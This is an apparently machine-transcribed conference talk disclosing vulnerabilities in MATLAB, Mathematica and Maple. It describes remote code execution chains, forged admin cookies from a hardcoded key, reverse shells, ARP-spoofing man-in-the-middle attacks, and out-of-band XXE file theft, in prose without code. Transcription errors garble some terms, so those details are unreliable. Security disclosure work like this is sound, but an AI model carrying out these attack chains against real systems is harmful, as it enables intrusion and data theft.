 Okay, so this afternoon's talk is, sorry for the lame title. And Toma, let's give a big DEF CON welcome, come on! Later! Thanks. Wow, it's an honor to be here at DEF CON again. I hope you do enjoy yourselves as well. I'm Toma. I've been calling myself a hacker for almost 10 years. I'm from Hungary and I've worked for an IT security company in Hungary as a Panthaster and developer. This is my first time at DEF CON and I'm also a regular speaker at Central Europe's Hacker Conference activity. That's enough about me. How do I choose this topic? It was not the usual way, so I didn't have any interest in MATLAB and the software, but I was at Fran's birthday party and at two or three o'clock in the morning, her sister asked me if I could help her in MATLAB. And I had some vague memories about MATLAB back from university, but of course they said yes. So the next day that was I sitting in my room installing MATLAB and it's a rule of thumb. What I install on my machine, I try to hack. And there was a lot of stuff to hack. This software is huge. There are several web servers, it's cloud integration, lots of functionalities, lots of attack surfaces. So hacking is fun, so I dived in, but I didn't want to discriminate MATLAB. So I also downloaded a trial of Mathematica and MAPR, and together they gave a pretty nice topic to talk about. In this talk, probably won't be the most technical talk you will hear at DEF CON. I won't show you any groundbreaking techniques or methodologies, but I will show you a bunch of zero days in this free software. Let's start with MATLAB, some simple stuff. Like every scripting language, MATLAB has also facilities to run native codes, native commands. It has a system command which you can use to execute OS commands. You can also use the bank symbol. And there are facilities to load native libraries, Java or .NET libraries and come objects to. This is of course not a vulnerability in itself, but can be used for malicious purposes. For example, spearfishing attack can be created with the malicious MATLAB script. One other interesting aspect of this native command execution is that you can download MATLAB mobile and you can create a free registration at MATLAB servers and you can actually run MATLAB functions on MATLAB servers and this is not white listed or black listed, so you can also run these system commands on their servers. Granted, it's in a Docker environment. I did not try to escape it, but we all know that it's just a privilege escalation by the way. Okay, so I mentioned using malicious MATLAB scripts in a phishing attack or something like that, but it should be fairly easy to protect against these attacks because you just have to scan your scripts for these dangerous functions. But MATLABs have a solution against IP theft which is the function p-code. With p-code, you can upskate your MATLAB scripts so it won't be dealt with what they do. MATLABs have uses it, lots and lots of functionalities in MATLAB are implemented as p-files, p-coded MATLAB scripts. Even though Matworks has a warning that this is merely an application, it's not secure enough to trust your sensitive data to it. But because lots of MATLABs functionality is implemented as p-files, I needed to reverse engineer this algorithm. This was kind of painful because there are a huge number of native libraries that call JavaJarse, that in turn execute MATLAB p-files that sometimes go back to Java libraries. So from an external viewpoint, it's quite a mess. And it got me confused a few times. One of these even created a nice fair-night topic. I have found an RCE bug via static code analysis. But it turned out that that code was some leftover that code that is not used anyway. So eventually I have found the p-code implementation and I was able to create a Python script that decodes p-files back to MATLAB scripts. It was a huge internal debate with myself if I should release this Python script but I have decided against it. Because even though MATLAB has that warning, lots of people use p-code to protect their research and I didn't want to expose it. But I will show you the most interesting step of the p-code algorithm. p-code consists of three steps. There's a serialization step, a compression and an encryption step. The latter two are implemented in the M underscore parser library and they are pretty straightforward. They are really easy to reverse engineer so if you are interested in it you could do it without problems. The serialization was more interesting because it's a lot of probably C++ code and it would have been really painful to reverse engineer even with some decompiler. But what was interesting is that almost the whole algorithm could be understood by just looking at the p-files, just looking at the data. So here is a p-file, it's already color coded but even with the colors it should stick out that there are separate blocks that contain function names and numbers used in the scripts and string literals. So what remains to understood is this first block and this last. If you look at the first block it really seems to be seven D words that have very small values and if you look at these values, the first is zero X O C which is 12 and if you count the function names it's 12. The second number is two and there are two numbers. So these seven D words, it seems these are the numbers of symbols in the p-file. There are seven of them. I was able to identify three of them but it turned out that it's not really important so this was enough to reverse the algorithm. What remains is this last block which seems to be a combination of some random numbers that are in white and some zero X 80 80 something pairs. After a while it turned out that if you subtract zero X 80 80 from these pairs then the result is an index into this array. So the first one is zero X 80 80, you subtract zero X 80 80, you get zero and the zero element of the array is X and if we go back to the original script you can see that it is indeed starts with the X and the next symbol is an equal sign so maybe zero X 5 F represents the equal sign and maybe all these numbers represent some symbols or reserved words in Matlab language. So this was the part when I asked for the help of a disassembler, I looked for these numbers in the disassembly of the library and I found an array of the reserved words and symbols which could be easily extracted from the binary so it only needed to substitute those numbers with the symbols and the reserved words to get the original Matlab script. So it took a few days but it was easy enough to reverse engineer the whole algorithm only just by looking at the data. I've already told you about Matlab mobile and I've told you that you can connect to Matlab servers with it but it's not only Matlab servers you can connect to but you can create your own and you can connect to it too. The communication between the mobile application and the server is an HTTP communication it's plain HTTP, there is no possibility to set up HTTPS but the bodies seem to be base 64 encoded binary blobs so they are maybe encrypted. These are the request and response bodies. I have reverse engineered the server code and it turned out that it is indeed encrypted but it is encrypted by accelerating the plain text message with the Matlab servers password so it's really strong encryption but it gets better because every single plain text message is prefixed with a string Matlab connector dash v1 this means that if you have one single message you can access the first 18 bytes of it with a Matlab connector underscore v1 and you get the password. So this is pretty nice but the maximum password length is 32 bytes so what if somebody sets 32 bytes password? No worries because of the structure of the plain text messages these are JSON messages, there are always 32 static bytes at the beginning of a message so this is how request starts and this is how response starts so if you got one message from the Matlab mobile application to the server you can deduce the password. I have created a burst with pro extension that does exactly this, it retrieves the password and creates a Matlab connector tab that shows you the plain text message and lets you edit it. I didn't try to test further the Matlab mobile server but this could be a big help for that for easy fuzzing the server or something like that. This extension and all of my demos, all of my exploits will be available on my github shortly after my talks. You can download and play with it. Okay, while I was looking for the implementation of Matlab mobile I have found an interesting web.xml in the Matlab server. It described some surplots of which do seem very interesting the engine surplot and the Matlab surplot. The Matlab surplot evaluates functions via a get request. It is whitelisted, there are only a handful of functions that can be called and it is localhost only. But I was looking at all these functions that can be called and it turned out that the pslinkprivate function is basically just a wrapper around FEval. FEval is the Matlab function used to evaluate arbitrary Matlab functions. What this means is you can call arbitrary Matlab functions, the system function included, by just one get request to localhost to the Matlab server. So you can have a website that embeds an image with such a URL and if somebody with an open Matlab opens your website, it will execute whatever Matlab command you want. So this means basically remote code execution on victim's machine as we will shortly see. So yeah, you can see the calculator opened, thanks. Okay, so the other surplot is it also evaluates Matlab functions, but this does not work on a default configuration so you have to turn on engine surplot. But it still can be used to, I don't know, backdoor somebody's machine. With engine surplot there is no white or blacklist you can call any Matlab functions. It requires an API key, but this is burnt in to Matlab, it's Matlab. And it's also localhost only, at least in theory because they used the get request URL Java function to get the originating URL which uses the host header so it can be very easily faked. There's the key and I also have a demo for this. So I'm starting Matlab and I'm gonna show you the simpler code command that can be used to start calculator on victim's machine via Matlab. I'm just gonna fast forward a bit. So we can see that it's forbidden because engine surplot is not running right now. So this is the code that can be used to turn it on. Fast forwarding. Okay, it's on now and we try again, we get the calculator. So it's again remote code execution but it needs engine surplot to be turned on. Okay, moving on to another Matlab first product. It's called Matlab production server. It can be used to deploy Matlab functions on the Vab. It has an express based management dashboard which uses signed cookies to store the session. It uses the cookie session and the key group NPM packages for this. But it has a huge implementation problem because they have an array of two keys. It contains Matlab and Simulink but in reality only the first one is ever used. They never rotate the keys. We can confirm this by creating a signature from for a cookie using EG OpenSSL so you can see here's the password and we get the same signature that we got from the server. What this means for an attacker is that we can create super cookie that grants administration rights to any Matlab production servers always. And this can of course be used to run code on the Matlab production server because you can upload a Matlab function that contains only the system function and you can call it remotely. So I have a Python script that creates a new NPS instance. It creates a new application and deploys and starts it. And this application contains only the function Matlab call. So if we run this Python script, you can see it's working and we have a new NPS application. It's running all right. So now we can use the NPS shell.py script to run commands on the NPS server. So as you can see, it's a bit slow but it eventually answers with the results. So this is remote code execution without any authentication to the NPS server. So I did not do a thorough inspection of NPS. I did not have the time yet but I have found some additional flows. It's just an example. It's stored access. I'm sure there are several others. So it's a nice target I think. Okay, so moving on to another mass product. It's Mathematica. And it can also execute native commands but Mathematica notebooks are not scripted so they won't evaluate when you open them. But there are expressions called dynamics that can be used to evaluate expressions automatically but these dynamic expressions have some protections against malicious notebooks. There are some Mathematica functions, expressions that are dangerous and they won't evaluate via dynamic expression without user interaction. At least they shouldn't but I have found a way by trial and error to bypass this production. I'm a bit close. So I'm gonna show the poll on trial and error process in this demo. The first thing I've tried was a simple run command which can be used to run commands but it pops up the CMD window so I didn't like that. It turned out that run process does not pop up the CMD window so it looks better. Now I'm trying to wrap this into a dynamic and it became quite disaster because every time a dynamic is displayed it evaluates the expression so it was a loop and so eventually I managed to quit and I have also found a way to get around this infinite loop. We can use the tract symbols dynamic parameter to basically make a dynamic update only once when it first displayed. So now if we try to save this into a file and yeah, sorry. So I'm trying to open the file and there's indeed warning so it won't execute Pimbo without user interaction. I was looking through the documentation and I found another expression called, oh sorry, there's something other in this video too. There are so called safe directories and the documents inside safe directories are not checked for these dangerous functions so dynamics will always evaluate from them so if you can get somebody to download your malicious notebook to a safe location then you are good to go. No tricks necessary but if you don't have that luxury you can use the interpreter expression which is used to run expressions from a string and it should be a dangerous function but it turned out it's not. So this can be used to auto execute commands with a Mathematica notebook. So this is how you can bypass the dynamic protection. So really similar to Mathematica notebooks are computable document format documents. These are almost the same but they are running restricted environment, they are running a sandbox but you can also run them from a browser so it somewhat widens the attack surface. The biggest restriction of the sandbox is that you have no file system access. You can't download files, you can't even execute commands but there are still some ways to abuse these CDFs. When I was looking through the documentation I have found out that you can do TCP IP from CDFs and my very first thought was that I can create socks proxy with that. So if I can get someone to open my CDF document which implements the socks proxy then it will open proxy into the victim machine into the victim network. So I thought it would be pretty cool so I did implement that proxy and I'm gonna show you this with a Linux machine that runs X server, this is the victim and it will open the CDF file that implements the socks proxy and I'm gonna use it to create a screenshot of the X desktop remotely through the socks server. So I'm using SoCat to redirect the socks communication into a Unix SoCat, okay I started the CDF file creating the listening SoCat for the X 11 server. Just gonna go fast forward a little bit. Okay, so now everything is running, I can use XWD to download a screenshot from the X server. It runs quite a while so I'm fast forwarding again but when it's done, I'm converting it to a PNG and you can see that creating the screenshot was indeed successful, thank you. So another Wolfram research product is a lightweight grid manager. It's a clustering solution from Wolfram research. It's basically a Tomcat-based web application to manage mathematical kernels. It needs authentication to make changes but you can start kernels without authentication. It has some protection though because you can set up an IP white list but these protections have some very serious implementation flows. First for the authentication. This is the config file snippet that implements the authentication. You can see that it's only for get and post requests. This is the first flow, USC shortly Y and they also have an AGP listener available. This is a second flow. So the first one is a problem because the application will accept parameters from the query string and this means you can use a head HTTP request and it does not require authentication. It's not in the configuration file so you can change any configuration without authentication by just using head request. But you have to bypass the IP filter first. You can use AGP for this because via AGP you can lie about the source address. You can say that you are coming from local host so the application will accept your request because the IP filter is implemented in the application level and not in the application server level so this can be used to bypass the IP filter. There is one more vulnerability in this implementation that makes it really easy to exploit this. It has the, you can set the corners path via setting and that functionality contains an OS command injection vulnerability so this means if you combine these three vulnerabilities you can have arbitrary OS command injection on any lightweight grid manager server without any authentication. I have created a Python script that does this so you can see it's the AGM application. I'm gonna start listener and I'm going to start connect but shell by exploiting these vulnerabilities. Just forward again, you can see that I have a connection back and I can execute commands on the AGM server. Okay, one other thing about AGM it's not available that there is no trial or evaluate license but I really wanted to test it and I dig through the whole internet and I have found a university website where there was a Mathematica license number available for public so maybe you don't do that. Okay, so Mathematica and in general of all from products use the WSTP protocol to communicate internally between the kernel and the front end and externally in a clustering situation or with some third party native applications. This protocol uses plain text communication so it's pretty easy to launch a many middle attack against it and in this case many middle attack means remote code execution because you can send a WSTP evaluate packet which will be evaluated on the receiving side. I'm gonna show you this by connecting Mathematica to a grid and I'm running a simple calculation on the grid so I'm gonna calculate three times two using the grid and it gives us the result but when I start my many the middle attack script which uses a hex inject to replace any packets with one evaluate packet I'm using ARP space spoof to ARP Poison launching listener and when I try to compute three times two I get a Kanak Barshal so I can run OS commands on the server so this shows that the middle attack is really on remote code execution. You can also offload some heavy works from Mathematica to external programs so you can call functions from Mathematica from these external programs but that's dangerous functionality because these external programs can also talk back to you and they can also send evaluate packets so such an external program can execute code on your Mathematica server. I'm gonna show you this by slightly modifying one of the WSTP examples I'm adding to evaluate lines first one just in some message and the second one uses the run expression to the run process expression to start the calculator so I'm compiling it starting the external program and creating a link to this program in Mathematica. When I try to install this external program you can see that calculator runs so it's not an exploit not a vulnerability but just some dangerous functionality in the program. Okay my last target it's Maple when I installed it and tried it the first thing that stick out to me was that Maple documents are XML files it was not really a surprise that the software was susceptible to XXC attacks but this of course requires that the victim opens a malicious Maple document but there are two ports listening on every IP address on the default Maple install the first one is not really interesting it just accepts a number and shuts down the port but the second one TCP 1.991 it's really interesting because it's a simple remote control server here is the protocol you send it a ping it sends it back and now you can send the server a command which can be starting a Maple application Maple applications are defined as Java libraries so they are burnt into the software it's not an obvious way to exploit this command but you can also open Maple documents with the open command and if you have you create a file share and put your malicious Maple document on that file share then you can use this remote control server to open the malicious document from your file share on the victim's Maple machine there is an auto execute feature in Maple which can be used to execute native commands with this but it requires user interaction so it's a bit hard to exploit but you can combine this remote control server with the fact that the application is susceptible to XXC does not need user interaction but you can also do SRF or download files from victim's machine using an out of bands XXC attack which I'm going to show you so while Maple is starting you can see that the file is just a simple XXC payload. I'm starting an FTP server that we will receive the file we are going to steal. I'm also starting a web server that serves the second stage of the XXC payload. Okay. And I'm also starting an SMB server to serve my malicious Maple document. And now I can use the remote control server to open that document in the victim's Maple. So there's Bing hack and I'm opening that file from my server and this is where you will see the result of the XXC exploit. You can see it's a directory listing because Maple is in Java and you can do directory listing in Java with XXC. But I know you are, you all want to see another calculator so I'm going to give you that shortly. It's the same attack. I'm just, yeah, that's your calculator. It's an ASCII calculator. Okay. This was my last demo and this is the end of my talk. There are a lot of stuff to look at in this software still. So these are just a few ideas. These are the things I will probably look at in the future. But I encourage you to do the same. Look around this software. And this is the end. Thank you for listening to my talk.